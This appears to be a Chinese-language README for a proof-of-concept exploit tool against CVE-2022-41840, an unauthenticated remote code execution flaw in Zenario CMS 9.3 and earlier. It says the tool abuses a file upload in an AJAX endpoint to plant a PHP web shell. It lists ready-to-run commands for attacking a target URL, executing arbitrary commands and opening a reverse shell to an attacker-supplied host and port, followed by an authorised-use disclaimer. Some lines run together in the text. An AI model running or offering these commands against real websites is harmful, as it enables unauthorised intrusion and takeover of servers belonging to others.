
这是针对 CVE-2022-41840 的 PoC 漏洞利用,运行 Zenario
一个影响 Zenario CMS 9.3 及更早版本的未经身份验证的远程代码执行(RCE)漏洞。该漏洞利用 AJAX 端点中的文件上传漏洞来上传 PHP 网页后门并实现代码执行。
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requests 库安装依赖:
pip install requests
仅用于教育和授权安全测试目的。
本工具提供给安全研究人员和渗透测试人员,用于测试其拥有或已获明确授权的系统。未经授权访问计算机系统属违法行为,严禁使用。
维护者不承担因该工具的任何误用或损害而导致的任何责任。
本代码仅供教育目的提供。